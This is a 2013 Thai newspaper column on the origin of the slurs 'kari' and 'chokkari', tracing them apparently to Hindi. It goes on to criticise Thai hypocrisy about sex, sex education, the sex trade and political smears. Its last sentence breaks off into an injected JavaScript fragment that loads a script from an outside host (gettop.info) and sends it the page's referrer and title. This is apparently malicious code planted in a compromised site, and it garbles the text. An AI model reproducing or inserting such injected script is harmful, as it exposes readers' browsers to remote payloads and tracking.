มติชนรายวัน ฉบับประจำวันอังคารที่ 28 พฤษภาคม 2556

 

          อ. ประภัสสร์ ชูวิเชียร (คณะโบราณคดี ม. ศิลปากร) กรุณาอธิบายเพิ่มเติมว่า โฉกกฬี กับ โฉกกฬา เป็นภาษาฮินดี (ซึ่งเป็นภาษาของคนส่วนใหญ่ในอินเดีย) มีในพจนานุกรมภาษาฮินดี

          ทั้งหมดนี้ต้องขอบพระคุณ เพ็ญสุภา สุขคตะ ใจอินทร์ เขียนอธิบายคำว่า กะหรี่ ในมติชนสุดสัปดาห์ (ฉบับประจำวันที่ 17-23 พฤษภาคม 2556 หน้า 76) ทำให้ผมต้องควานหาเพิ่มเติม เพราะไม่เคยรู้มาก่อน

          กะหรี่ กับ ช็อกการี สองคำนี้เป็นภาษาปากของคนกรุงเทพฯ ตั้งแต่ก่อน พ.ศ. 2500 แล้วเป็นคำด่าผู้หญิงด้วย เช่น อีช็อกการี, อีกะหรี่ ถือว่าเจ็บแสบและลึกซึ้งมาก

          (แต่จะมีครั้งแรกเมื่อไร? ยังตรวจสอบไม่ได้ นอกจากเข้าใจตรงกันว่ายุคอยุธยา ยุคธนบุรี ไม่เคยพบสองคำนี้)

          ช็อกการี เป็นคำเต็มอย่างทางการ

          กะหรี่ เป็นภาษาปากของชาวบ้านทั่วไป ถือเป็นคำไม่สุภาพ บางทีถูกจัดเป็นคำหยาบคาย

          ก่อนนี้คนทั้งหมดที่รู้จักสองคำนี้ (มีผมรวมอยู่ด้วย) ต่างไม่เคยรู้ว่าเป็นภาษาอะไร? มาจากไหน? ตั้งแต่เมื่อไร?

          คำประเภทเกี่ยวข้องกับเรื่องทางเพศ(ไม่โดยตรงก็โดยอ้อม) เป็นที่รังเกียจของสังคมไทย จัดเป็นคำไม่สุภาพ จนถึงคำหยาบคาย, สกปรก, อุบาทว์, บัดสีบัดเถลิง

          ยิ่งคำเรียกอวัยวะเพศ ยิ่งหนักกว่าคำหยาบคายไปอีกยกใหญ่ ไม่ให้พูดในที่สาธารณะ ใครพูดแทบจะต้องมีบาปตกนรกขุมใหญ่

          ยิ่งเป็นผู้หญิงถ้าเผลอพูดออกไปก็แทบไม่ต้องผุดเกิดกันเลยทีเดียว

          เรื่องเพศจึงถูกใช้เป็นอาวุธที่มีประสิทธิภาพในการลดความน่าเชื่อถือ จนถึงทำลายฝ่ายตรงข้ามทางการเมือง นักการเมืองทั้งสองฝ่ายต่างฉวยใช้เมื่อมีโอกาส อย่างขาดสติสัมปชัญญะ ดังเห็นเป็นประจักษ์พยานรู้กันอยู่แล้ว

          ทั้งหมดนี้ส่งผลให้สังคมไทย (ซึ่งแสดงตนเสมอมาว่าเคร่งครัดในศีลธรรม) ทุกวันนี้ ทั้งห่างไกลและใกล้ชิดพฤติกรรมจริงๆทางสังคมวัฒนธรรม ได้แก่

          ห่างไกลเพศศึกษา ทั้งในแง่ของเพศสัมพันธ์และเพศสภาพ

          แต่ใกล้ชิดธุรกิจขายบริการทางเพศทุกรูปแบบ (ในนามอาบอบนวด) เสมือนปากว่าตาขยิบ และมือถือสาก ปากถือศีล ทำให้ใกล้ชิดเอดส์ทุกเพศทุกวัยและทุกสถานะทางสังคมอย่างไม่เหลื่อมล้ำs.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;